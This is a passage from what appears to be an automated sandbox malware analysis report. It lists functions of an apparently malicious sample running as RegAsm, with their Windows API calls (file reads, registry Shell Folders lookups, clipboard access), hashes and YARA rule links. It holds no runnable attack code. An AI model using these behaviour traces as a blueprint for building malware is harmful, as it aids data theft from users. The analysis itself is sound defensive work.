                                                                                                                                                                                                                      • Opcode ID: ffbe44a51c26d842ca56a491b3c7d92fb1c4d2adc00a6a519549e0909776451f
                                                                                                                                                                                                                      • Instruction ID: 6ff791ec813821c2e9e24527ebed0d702daabad41f6d5d50af9b89e3d4ad0470
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ffbe44a51c26d842ca56a491b3c7d92fb1c4d2adc00a6a519549e0909776451f
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: ADC09BB15117014BE7305F15D40471373D49F11727F318C1DA5D1914C2D77CD4408518
                                                                                                                                                                                                                      Function 004135E0 Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • FreeLibrary.KERNEL32(?,00413603,00000000,0044557A,?,?,?,?,?,00403335,?), ref: 004135EC
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000015.00000002.486254625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: FreeLibrary
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 3664257935-0
                                                                                                                                                                                                                      • Opcode ID: 844f7501f44133ba018c3401d7aef3826eb6c790b17bce713828cee3c51aa695
                                                                                                                                                                                                                      • Instruction ID: 97b2006ec1e2dd28fddd19cbcf35086f2a6b1d7d6d8af37d8808782836c913ed
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 844f7501f44133ba018c3401d7aef3826eb6c790b17bce713828cee3c51aa695
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C1C04C355107129BE7318F22C849793B3E8BB00767F40C818A56A85454D7BCE594CE28
                                                                                                                                                                                                                      Function 0041493C Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • EnumResourceNamesW.KERNEL32(?,?,Function_000148B6,00000000), ref: 0041494B
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000015.00000002.486254625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: EnumNamesResource
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 3334572018-0
                                                                                                                                                                                                                      • Opcode ID: 66f1156765df5e37ef2ff2f84c2d9879992723494834984b76c3e66af834c78a
                                                                                                                                                                                                                      • Instruction ID: 4cd0fc1a45efe5f4a77ff86a676eea9814a6d41529a344ef69fdb726e0e13cac
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 66f1156765df5e37ef2ff2f84c2d9879992723494834984b76c3e66af834c78a
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5CC09B355943819FD711DF108C05F1A76D5BF95705F104C397151940A0C7614014A60A
                                                                                                                                                                                                                      Function 0044DEA5 Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000015.00000002.486254625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: FreeLibrary
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 3664257935-0
                                                                                                                                                                                                                      • Opcode ID: bc29afbdeb633a61cc40634aee98d5405fe4c9068b08d77425fcd78e2ed3a7cd
                                                                                                                                                                                                                      • Instruction ID: c12df66a07a312a107e4de7a98dbd39cb061029a89fa16cd2619b088cce9516a
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: bc29afbdeb633a61cc40634aee98d5405fe4c9068b08d77425fcd78e2ed3a7cd
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 95C04C35D10311ABFB31AB11ED4975232A5BB00717F52006494128D065D7B8E454CB2D
                                                                                                                                                                                                                      Function 0040AEBE Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • FindClose.KERNEL32(?,0040AE21,?,00000000,00445EF5,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AEC8
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000015.00000002.486254625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: CloseFind
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 1863332320-0
                                                                                                                                                                                                                      • Opcode ID: c351b702f3e9cabc65afcca29c8835cc335007c1b5069ed2425bca2f993f3ba3
                                                                                                                                                                                                                      • Instruction ID: 0a5868f0c47a417661f40efe111cada53839b745ef6d73ffe26d621af3302058
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: c351b702f3e9cabc65afcca29c8835cc335007c1b5069ed2425bca2f993f3ba3
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 06C092341506058BD62C5F38DC9A42A77A0BF4A3303B40F6CA0F3D24F0E73888538A04
                                                                                                                                                                                                                      Function 00414592 Relevance: 1.5, APIs: 1, Instructions: 7registryCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • RegOpenKeyExW.KERNEL32(80000002,80000002,00000000,00020019,80000002,00414CC1,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00445DDE,?,?,00000000), ref: 004145A5
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000015.00000002.486254625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Open
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 71445658-0
                                                                                                                                                                                                                      • Opcode ID: cea4c8dffb5a7e03adddd135b873dbda16caaf5da1da7b073e7ed9ea122c33c6
                                                                                                                                                                                                                      • Instruction ID: 4e31294bd56c0fd8f54a78566f459ab053e1b17b284f5820c9a90ca28514d216
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: cea4c8dffb5a7e03adddd135b873dbda16caaf5da1da7b073e7ed9ea122c33c6
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C4C09B35544311BFDE114F40FD09F09BB61BB84B05F004414B254640B182714414EB17
                                                                                                                                                                                                                      Function 00409B98 Relevance: 1.5, APIs: 1, Instructions: 7COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • GetFileAttributesW.KERNEL32(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000015.00000002.486254625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: AttributesFile
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 3188754299-0
                                                                                                                                                                                                                      • Opcode ID: 58881c252121c77da0d0db5638804f50f66f4a7a85cb6d231bcd6b2301be346c
                                                                                                                                                                                                                      • Instruction ID: 3e515636d229e53f9e638efbf3d1d2cf0185fd636b5c9b7db17c068ea44c501e
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 58881c252121c77da0d0db5638804f50f66f4a7a85cb6d231bcd6b2301be346c
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: B9B012792104005BCB0807349C4904D35507F456317200B3CF033C00F0D730CC61BA00
                                                                                                                                                                                                                      Function 0041BE52 Relevance: 1.3, APIs: 1, Instructions: 99COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000015.00000002.486254625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                      • Opcode ID: 519045b8856ea86e6d8d1e97e8a9a2cac293cdb0bbecd69caab4774d1a49c2e8
                                                                                                                                                                                                                      • Instruction ID: 186a7b248be49691fb09735f75239c469d17650efe27a5986e87276cb9a2b443
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 519045b8856ea86e6d8d1e97e8a9a2cac293cdb0bbecd69caab4774d1a49c2e8
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: E8318B31901616EFDF24AF25D8417DA73A0FF04314F10416BF91497251DB38ADE18BDA
                                                                                                                                                                                                                      Function 004095D9 Relevance: 1.3, APIs: 1, Instructions: 66COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • memset.MSVCRT ref: 004095FC
                                                                                                                                                                                                                        • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                                                                                                                        • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                                                                                                                        • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                                                                                                                        • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                                                                                                                        • Part of subcall function 00409B98: GetFileAttributesW.KERNEL32(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                                                                                                                                                        • Part of subcall function 004091B8: memset.MSVCRT ref: 004091E2
                                                                                                                                                                                                                        • Part of subcall function 004091B8: memcpy.MSVCRT(?,00000000,?,?,?,?,?,?,?,?,?,?,00000143,00000000), ref: 004092C9
                                                                                                                                                                                                                        • Part of subcall function 004091B8: memcmp.MSVCRT ref: 004092D9
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000015.00000002.486254625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: memsetwcslen$AttributesFilememcmpmemcpywcscatwcscpy
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 3655998216-0
                                                                                                                                                                                                                      • Opcode ID: e30004be4bbbfeced16a1849f7c4d541b3adc094efc719b7744e08ea692a1bc4
                                                                                                                                                                                                                      • Instruction ID: 072a19641c33d96fdc78833b4ff670bebeeceb9371718ab52934a970b5968781
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: e30004be4bbbfeced16a1849f7c4d541b3adc094efc719b7744e08ea692a1bc4
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: F311607290021D6AEF20A662DC4AE9B376CEF41318F10047BB908E51D2EA79DE548659
                                                                                                                                                                                                                      Function 00445403 Relevance: 1.3, APIs: 1, Instructions: 60COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • memset.MSVCRT ref: 00445426
                                                                                                                                                                                                                        • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                                                                                                                        • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                                                                                                                        • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                                                                                                                        • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                                                                                                                        • Part of subcall function 00409B98: GetFileAttributesW.KERNEL32(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                                                                                                                                                        • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B71C
                                                                                                                                                                                                                        • Part of subcall function 0040B6EF: wcsrchr.MSVCRT ref: 0040B738
                                                                                                                                                                                                                        • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B756
                                                                                                                                                                                                                        • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B7F5
                                                                                                                                                                                                                        • Part of subcall function 0040B6EF: CreateFileW.KERNEL32(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000015.00000002.486254625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: memset$Filewcslen$AttributesCreatewcscatwcscpywcsrchr
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 1828521557-0
                                                                                                                                                                                                                      • Opcode ID: ea4a949cbb04dc179977b6e9e50e7a1e4e6e0668b18cbdf2d6b9d2270a501428
                                                                                                                                                                                                                      • Instruction ID: 9d1500c39017731ad640c46c84131142cb98d7893e2d711cbdbff08f65233ce4
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ea4a949cbb04dc179977b6e9e50e7a1e4e6e0668b18cbdf2d6b9d2270a501428
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4B1186B294011D7BEB10E751DC4AFDB776CEF51328F10047FB518A50C2E6B8AAC486A9
                                                                                                                                                                                                                      Function 004068BF Relevance: 1.3, APIs: 1, Instructions: 59COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                        • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                                                                                                                                                                                                                        • Part of subcall function 004062A6: SetFilePointerEx.KERNEL32(0040627C,?,?,00000000,00000000), ref: 004062C2
                                                                                                                                                                                                                      • memcpy.MSVCRT(00000000,00000000,?,00000000,00000000,?,00000000,0040627C), ref: 00406942
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000015.00000002.486254625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: ??2@FilePointermemcpy
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 609303285-0
                                                                                                                                                                                                                      • Opcode ID: cfa0e116d589173c1f74b587a6cbbf9e28bf831d76649fdc759f8710e9f20be5
                                                                                                                                                                                                                      • Instruction ID: a147fa8ec668463fbbadbca9a08a444fcb23aa95a0ceadfc627c4072e562ebd5
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: cfa0e116d589173c1f74b587a6cbbf9e28bf831d76649fdc759f8710e9f20be5
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4B11A7B2500108BBDB11A755C840F9F77ADDF85318F16807AF90677281C778AE2687A9
                                                                                                                                                                                                                      Function 00406B90 Relevance: 1.3, APIs: 1, Instructions: 56COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000015.00000002.486254625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: _wcsicmp
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 2081463915-0
                                                                                                                                                                                                                      • Opcode ID: b978923b786281d4dff967b9753de8351d719aa9e76d1b7e7943c841c1b1a5dc
                                                                                                                                                                                                                      • Instruction ID: 44e68c08f8902dbc9d3bec9e3d7b81d72528a2b8c41660eeece459a1934edfa0
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b978923b786281d4dff967b9753de8351d719aa9e76d1b7e7943c841c1b1a5dc
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0C118CB1600205AFD710DF65C8809AAB7F8FF44314F11843EE55AE7240EB34F9658B68
                                                                                                                                                                                                                      Function 00406214 Relevance: 1.3, APIs: 1, Instructions: 39COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                        • Part of subcall function 00406294: CloseHandle.KERNEL32(000000FF), ref: 0040629C
                                                                                                                                                                                                                        • Part of subcall function 004096C3: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                                                                                                                                                                      • GetLastError.KERNEL32(00000000,00000000,0040E03C,?,00000000,00000104,00000000,?,?,?,0040E521,?,0040E6A3,000000FF,?,00000104), ref: 00406281
                                                                                                                                                                                                                        • Part of subcall function 0040A2EF: ReadFile.KERNEL32(00000000,00000000,004450DD,00000000,00000000), ref: 0040A306
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000015.00000002.486254625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: File$CloseCreateErrorHandleLastRead
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 2136311172-0
                                                                                                                                                                                                                      • Opcode ID: b6bd1096ce10d17f9a7701a6d0a27b928aedeb77931263aba22673ea05e1db24
                                                                                                                                                                                                                      • Instruction ID: 5eec059ee86d0bbb8aaa5289f200f29bbda103cdac5cb86a40c163b72aa3aa4c
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b6bd1096ce10d17f9a7701a6d0a27b928aedeb77931263aba22673ea05e1db24
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3F01D6B14017018FD7206B70CD05BA273D8EF10319F11897EE55BE62D1EB3C9861866E
                                                                                                                                                                                                                      Function 0040AFCF Relevance: 1.3, APIs: 1, Instructions: 12COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                        • Part of subcall function 0040B04B: ??3@YAXPAX@Z.MSVCRT(00000000,00401B44,0044E518,?,00000001,00401B95,?,00401EE4), ref: 0040B052
                                                                                                                                                                                                                      • ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000015.00000002.486254625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: ??2@??3@
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 1936579350-0
                                                                                                                                                                                                                      • Opcode ID: c1d2223be94a68f833538aabce888aab0279aa93460cd9bacb51074fa57d6133
                                                                                                                                                                                                                      • Instruction ID: 89dc8af08517091935dcea8fd058adf4401913b4726dbdea6cb301b2924d739e
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: c1d2223be94a68f833538aabce888aab0279aa93460cd9bacb51074fa57d6133
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8FC02B7240C2100FD730FF74340205736D4CE422203028C2FE0E4D3101DB3C840103C8
                                                                                                                                                                                                                      Function 0040B633 Relevance: 1.3, APIs: 1, Instructions: 10COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000015.00000002.486254625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: free
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 1294909896-0
                                                                                                                                                                                                                      • Opcode ID: 6cac8f1a699deb91221d7a6f108e22352180a1071cf07404188a59dfc78ebdbf
                                                                                                                                                                                                                      • Instruction ID: 84c58710a9e867f17c2d1ed9f7495b278bdfae561cd9e9721482330d0bfefd66
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 6cac8f1a699deb91221d7a6f108e22352180a1071cf07404188a59dfc78ebdbf
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 48C00272510B018FEB209E16C405762B3E4AF5173BF928C1D949591481D77CE4448A1D
                                                                                                                                                                                                                      Function 0040AA04 Relevance: 1.3, APIs: 1, Instructions: 10COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000015.00000002.486254625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: free
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 1294909896-0
                                                                                                                                                                                                                      • Opcode ID: 9f3c014d0cf6ef3ef7071a5cb6dd1d5584685ccd4eb021183226fc9c7d12a071
                                                                                                                                                                                                                      • Instruction ID: 146ea39d6618054f0b1de7ea1636ea0e57db3b52e0d7afa8327ef8e2ad9437d0
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 9f3c014d0cf6ef3ef7071a5cb6dd1d5584685ccd4eb021183226fc9c7d12a071
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 18C012B29107018BFB308E15C409322B2E4AF0072BFA18C0D9090910C2C77CD080CA18

                                                                                                                                                                                                                      Non-executed Functions

                                                                                                                                                                                                                      Function 004098E2 Relevance: 16.6, APIs: 11, Instructions: 59clipboardmemoryfileCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • EmptyClipboard.USER32 ref: 004098EC
                                                                                                                                                                                                                        • Part of subcall function 004096C3: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                                                                                                                                                                      • GetFileSize.KERNEL32(00000000,00000000), ref: 00409909
                                                                                                                                                                                                                      • GlobalAlloc.KERNEL32(00002000,00000002), ref: 0040991A
                                                                                                                                                                                                                      • GlobalLock.KERNEL32(00000000), ref: 00409927
                                                                                                                                                                                                                      • ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 0040993A
                                                                                                                                                                                                                      • GlobalUnlock.KERNEL32(00000000), ref: 0040994C
                                                                                                                                                                                                                      • SetClipboardData.USER32(0000000D,00000000), ref: 00409955
                                                                                                                                                                                                                      • GetLastError.KERNEL32 ref: 0040995D
                                                                                                                                                                                                                      • CloseHandle.KERNEL32(?), ref: 00409969
                                                                                                                                                                                                                      • GetLastError.KERNEL32 ref: 00409974
                                                                                                                                                                                                                      • CloseClipboard.USER32 ref: 0040997D
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000015.00000002.486254625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: ClipboardFileGlobal$CloseErrorLast$AllocCreateDataEmptyHandleLockReadSizeUnlock
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 3604893535-0
                                                                                                                                                                                                                      • Opcode ID: 92cf2ad6ca5c713dde206082ad36a5e7808ef459d862ee33826dd65d962f9f86
                                                                                                                                                                                                                      • Instruction ID: b216396755dc4e0bfb1664a9ae46c4c33dbc75b884417c11e98c88a04b476fe2
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 92cf2ad6ca5c713dde206082ad36a5e7808ef459d862ee33826dd65d962f9f86
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3D113D7A540204BBE7105FA6DC4CA9E7B78FB06356F10457AF902E22A1DB748901CB69
                                                                                                                                                                                                                      Function 0040987A Relevance: 12.0, APIs: 8, Instructions: 42clipboardmemoryCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • EmptyClipboard.USER32 ref: 00409882
                                                                                                                                                                                                                      • wcslen.MSVCRT ref: 0040988F
                                                                                                                                                                                                                      • GlobalAlloc.KERNEL32(00002000,00000002,?,?,?,?,00411A1E,-00000210), ref: 0040989F
                                                                                                                                                                                                                      • GlobalLock.KERNEL32(00000000), ref: 004098AC
                                                                                                                                                                                                                      • memcpy.MSVCRT(00000000,?,00000002,?,?,?,00411A1E,-00000210), ref: 004098B5
                                                                                                                                                                                                                      • GlobalUnlock.KERNEL32(00000000), ref: 004098BE
                                                                                                                                                                                                                      • SetClipboardData.USER32(0000000D,00000000), ref: 004098C7
                                                                                                                                                                                                                      • CloseClipboard.USER32 ref: 004098D7
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000015.00000002.486254625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: ClipboardGlobal$AllocCloseDataEmptyLockUnlockmemcpywcslen
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 1213725291-0
                                                                                                                                                                                                                      • Opcode ID: ef81b411bc32b98b0d58beac2f1626bda71a649682fb6f24e39e44ffb2f3f244
                                                                                                                                                                                                                      • Instruction ID: b754b6ca90195c8d8a6f67e3e00c953256c5cf8724ac1a445a604cc17dd28da6
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ef81b411bc32b98b0d58beac2f1626bda71a649682fb6f24e39e44ffb2f3f244
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4AF0967B1402246BD2112FA6AC4DD2B772CFB86B56B05013AF90592251DA3448004779
                                                                                                                                                                                                                      Function 004182CE Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 69windowCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • GetLastError.KERNEL32 ref: 004182D7
                                                                                                                                                                                                                        • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
                                                                                                                                                                                                                      • FormatMessageW.KERNEL32(00001300,00000000,00000000,00000000,?,00000000,00000000), ref: 004182FE
                                                                                                                                                                                                                      • FormatMessageA.KERNEL32(00001300,00000000,00000000,00000000,?,00000000,00000000), ref: 00418327
                                                                                                                                                                                                                      • LocalFree.KERNEL32(?), ref: 00418342
                                                                                                                                                                                                                      • free.MSVCRT ref: 00418370
                                                                                                                                                                                                                        • Part of subcall function 00417434: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000000,?,?,756F18FE,?,0041755F,?), ref: 00417452
                                                                                                                                                                                                                        • Part of subcall function 00417434: malloc.MSVCRT ref: 00417459
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
